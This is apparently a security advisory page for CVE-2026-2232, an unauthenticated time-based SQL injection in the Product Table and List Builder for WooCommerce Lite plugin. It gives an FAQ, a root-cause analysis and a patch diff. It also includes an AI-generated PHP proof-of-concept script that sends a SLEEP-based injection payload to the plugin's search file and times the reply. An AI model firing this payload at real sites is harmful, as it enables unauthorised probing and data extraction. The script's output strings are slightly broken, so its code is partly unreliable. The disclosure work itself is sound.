What is CVE-2026-2232?

CVE-2026-2232 is a high-severity vulnerability in the Product Table and List Builder for WooCommerce Lite plugin for WordPress. It allows unauthenticated attackers to perform time-based SQL injection via the ‘search’ parameter, potentially leading to the extraction of sensitive information from the database.

How does the SQL injection work?

The vulnerability arises from insufficient input sanitization and the use of unprepared SQL queries in the plugin’s search functionality. Attackers can inject malicious SQL code through the ‘search’ parameter, which can manipulate the database and extract data.

Who is affected by this vulnerability?

Any WordPress site using the Product Table and List Builder for WooCommerce Lite plugin version 4.6.2 or earlier is affected. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the wc-product-table-lite plugin installed on your WordPress site. If it is version 4.6.2 or earlier, your site is at risk.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Product Table and List Builder for WooCommerce Lite plugin to version 4.6.3 or later. This version includes a patch that addresses the SQL injection issue.

What does a CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity level, meaning that the vulnerability poses a significant risk to affected systems. It suggests that exploitation could lead to serious consequences, including unauthorized access to sensitive data.

What are the risks of exploitation?

Successful exploitation of this vulnerability can allow attackers to execute blind SQL injection attacks, leading to the extraction of sensitive information such as user credentials and payment data. This could result in data theft and compromise of the entire site.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates the vulnerability by sending a crafted payload to the search endpoint of the plugin. If the injection is successful, the attacker can trigger a time delay, indicating that the SQL injection is exploitable.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the plugin until a secure version can be applied. Additionally, monitor your site for unusual activity and implement web application firewalls to help mitigate potential exploitation.

Are there any known exploits in the wild?

As of now, there are no confirmed reports of exploits in the wild specifically targeting CVE-2026-2232. However, due to the nature of SQL injection vulnerabilities, it is crucial to address them promptly to prevent potential attacks.

How can I protect my WordPress site from future vulnerabilities?

To enhance the security of your WordPress site, regularly update all plugins and themes, use security plugins, and implement best practices such as strong passwords and user role management. Regular security audits can also help identify and mitigate risks.

Where can I find more information about this vulnerability?

More information about CVE-2026-2232 can be found on the National Vulnerability Database (NVD) and security advisories from reputable sources such as WordPress security blogs and forums.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-2232: Product Table and List Builder for WooCommerce Lite <= 4.6.2 – Unauthenticated Time-Based SQL Injection via 'search' Parameter (wc-product-table-lite)

CVE ID CVE-2026-2232

Plugin wc-product-table-lite

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 4.6.2

Patched Version 4.6.3

Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2232:
This vulnerability is an unauthenticated time-based SQL injection in the Product Table and List Builder for WooCommerce Lite WordPress plugin. The flaw exists in the plugin’s search functionality, allowing attackers to inject malicious SQL payloads via the ‘search’ parameter. The CVSS score of 7.5 reflects a high-severity issue enabling data extraction.

Atomic Edge research identifies the root cause as insufficient input sanitization and a lack of prepared SQL statements in the `wc-product-table-lite/search.php` file. The vulnerable code constructs SQL queries by directly concatenating user-controlled input into the query string. Specifically, lines 548, 569-576, and 595-597 in the diff show the unpatched code building queries using string concatenation with the `$esc_keyword` and `$esc_keyword_phrase` variables. The `$wpdb->esc_like()` function provides insufficient protection against SQL injection.

Exploitation occurs via HTTP requests to the plugin’s search endpoint. An unauthenticated attacker sends a crafted payload in the ‘search’ parameter. The payload contains SQL syntax that, when concatenated into the query, triggers a time-delay conditional response. For example, an attacker could send a payload like `’ OR IF(1=1,SLEEP(5),0)– -` to test for and then extract database information through boolean-based or time-based inference.

The patch in version 4.6.3 replaces the vulnerable string concatenation with proper use of `$wpdb->prepare()` statements. In the diff, lines 548-556, 569-580, and 595-602 now wrap the dynamic query parts and user input with `$wpdb->prepare()`. This method ensures user input is safely escaped and treated as data, not executable SQL code. The patch also updates the plugin version constants in `main.php`.

Successful exploitation allows an unauthenticated attacker to perform blind SQL injection attacks against the WordPress database. Attackers can extract sensitive information including user credentials, API keys, payment data, and other private content stored within the site’s database. This can lead to complete site compromise, data theft, and further privilege escalation within the hosting environment.

Differential between vulnerable and patched code

Code Diff

--- a/wc-product-table-lite/main.php
+++ b/wc-product-table-lite/main.php
@@ -5,10 +5,10 @@
  * Description: Display your WooCommerce products in beautiful table and list layouts that are mobile responsive and fully customizable.
  * Author: WC Product Table
  * Author URI: https://profiles.wordpress.org/wcproducttable/
- * Version: 4.6.2
+ * Version: 4.6.3
  *
  * WC requires at least: 3.4.4
- * WC tested up to: 10.3.6
+ * WC tested up to: 10.5.0
  *
  * Text Domain: wc-product-table-pro
  * Domain Path: /languages/
@@ -21,7 +21,7 @@

 define('WCPT_DEV', false);

-define('WCPT_VERSION', '4.6.2');
+define('WCPT_VERSION', '4.6.3');
 define('WCPT_PLUGIN_PATH', plugin_dir_path(__FILE__));
 define('WCPT_PLUGIN_URL', plugin_dir_url(__FILE__));
 define('WCPT_TEXT_DOMAIN', 'wc-product-table-pro');
--- a/wc-product-table-lite/search.php
+++ b/wc-product-table-lite/search.php
@@ -546,7 +546,15 @@
   // phrase like
   if ($permitted['phrase_like']) {
     $esc_keyword_phrase = $wpdb->esc_like($keyword_phrase);
-    $post_ids = apply_filters('wcpt_search__query_results', $wpdb->get_col($query . " LIKE '%$esc_keyword_phrase%'"));
+    $post_ids = apply_filters(
+      'wcpt_search__query_results',
+      $wpdb->get_col(
+        $wpdb->prepare(
+          $query . " LIKE %s",
+          '%' . $esc_keyword_phrase . '%'
+        )
+      )
+    );
     $location['phrase_like'] = $post_ids;

     foreach ($wcpt_search__keyword_product_matches as $_keyword => $post_ids) {
@@ -567,15 +575,18 @@
       $conditions_parts = explode('AND', $query_parts[1]);
       $fixed_conditions = implode('AND', array_slice($conditions_parts, 0, -1));

-      // Build the query
-      $exact_query = $base_query .
-        "WHERE " . $fixed_conditions .
-        "AND (
-                " . end($conditions_parts) . " = '$esc_keyword'
-                OR " . end($conditions_parts) . " LIKE '% $esc_keyword %'
-                OR " . end($conditions_parts) . " LIKE '$esc_keyword %'
-                OR " . end($conditions_parts) . " LIKE '% $esc_keyword'
-            )";
+      // Build the query using prepare() for safety
+      $exact_query = $wpdb->prepare(
+        $base_query . "WHERE " . $fixed_conditions .
+        "AND (" . end($conditions_parts) . " = %s
+              OR " . end($conditions_parts) . " LIKE %s
+              OR " . end($conditions_parts) . " LIKE %s
+              OR " . end($conditions_parts) . " LIKE %s)",
+        $esc_keyword,
+        '% ' . $esc_keyword . ' %',
+        $esc_keyword . ' %',
+        '% ' . $esc_keyword
+      );

       $post_ids = apply_filters('wcpt_search__query_results', $wpdb->get_col($exact_query));
       $location['keyword_exact'] = array_merge($location['keyword_exact'], $post_ids);
@@ -592,10 +603,13 @@
       $conditions_parts = explode('AND', $query_parts[1]);
       $fixed_conditions = implode('AND', array_slice($conditions_parts, 0, -1));

-      // Build the query with LIKE
-      $like_query = $base_query .
+      // Build the query with LIKE using prepare()
+      $like_query = $wpdb->prepare(
+        $base_query .
         "WHERE " . $fixed_conditions .
-        "AND " . end($conditions_parts) . " LIKE '%$esc_keyword%'";
+        "AND " . end($conditions_parts) . " LIKE %s",
+        '%' . $esc_keyword . '%'
+      );

       $post_ids = apply_filters('wcpt_search__query_results', $wpdb->get_col($like_query));
       $location['keyword_like'] = array_merge($location['keyword_like'], $post_ids);

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2232 - Product Table and List Builder for WooCommerce Lite <= 4.6.2 - Unauthenticated Time-Based SQL Injection via 'search' Parameter

<?php

$target_url = 'https://vulnerable-site.com/wp-content/plugins/wc-product-table-lite/search.php';

// Time-based SQL injection payload
// This payload tests if the parameter is vulnerable by triggering a 5-second delay if injection succeeds
$malicious_search = "' OR IF(1=1,SLEEP(5),0)-- -";

// Prepare POST data
$post_data = array(
    'search' => $malicious_search
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 15); // Set timeout longer than the sleep duration

// Measure response time
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);

$elapsed_time = $end_time - $start_time;
curl_close($ch);

// Analyze result
if ($elapsed_time >= 5) {
    echo "[+] VULNERABLE: Server responded after {$elapsed_time} seconds (expected delay triggered).n";
    echo "[+] Confirmed unauthenticated time-based SQL injection via 'search' parameter.n";
} else {
    echo "[-] NOT VULNERABLE: Server responded after {$elapsed_time} seconds (no significant delay).n";
    echo "[-] The site may be patched or not running the vulnerable plugin version.n";
}

?>

Frequently Asked Questions

What is CVE-2026-2232?
Overview of the vulnerability
CVE-2026-2232 is a high-severity vulnerability in the Product Table and List Builder for WooCommerce Lite plugin for WordPress. It allows unauthenticated attackers to perform time-based SQL injection via the ‘search’ parameter, potentially leading to the extraction of sensitive information from the database.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and the use of unprepared SQL queries in the plugin’s search functionality. Attackers can inject malicious SQL code through the ‘search’ parameter, which can manipulate the database and extract data.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Product Table and List Builder for WooCommerce Lite plugin version 4.6.2 or earlier is affected. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Version verification steps
To determine if your site is vulnerable, check the version of the wc-product-table-lite plugin installed on your WordPress site. If it is version 4.6.2 or earlier, your site is at risk.
How can I fix this vulnerability?
Updating the plugin
To mitigate this vulnerability, update the Product Table and List Builder for WooCommerce Lite plugin to version 4.6.3 or later. This version includes a patch that addresses the SQL injection issue.
What does a CVSS score of 7.5 indicate?
Understanding severity ratings
A CVSS score of 7.5 indicates a high severity level, meaning that the vulnerability poses a significant risk to affected systems. It suggests that exploitation could lead to serious consequences, including unauthorized access to sensitive data.
What are the risks of exploitation?
Potential impacts of the vulnerability
Successful exploitation of this vulnerability can allow attackers to execute blind SQL injection attacks, leading to the extraction of sensitive information such as user credentials and payment data. This could result in data theft and compromise of the entire site.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates the vulnerability by sending a crafted payload to the search endpoint of the plugin. If the injection is successful, the attacker can trigger a time delay, indicating that the SQL injection is exploitable.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the plugin until a secure version can be applied. Additionally, monitor your site for unusual activity and implement web application firewalls to help mitigate potential exploitation.
Are there any known exploits in the wild?
Current threat landscape
As of now, there are no confirmed reports of exploits in the wild specifically targeting CVE-2026-2232. However, due to the nature of SQL injection vulnerabilities, it is crucial to address them promptly to prevent potential attacks.
How can I protect my WordPress site from future vulnerabilities?
Best practices for security
To enhance the security of your WordPress site, regularly update all plugins and themes, use security plugins, and implement best practices such as strong passwords and user role management. Regular security audits can also help identify and mitigate risks.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-2232 can be found on the National Vulnerability Database (NVD) and security advisories from reputable sources such as WordPress security blogs and forums.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations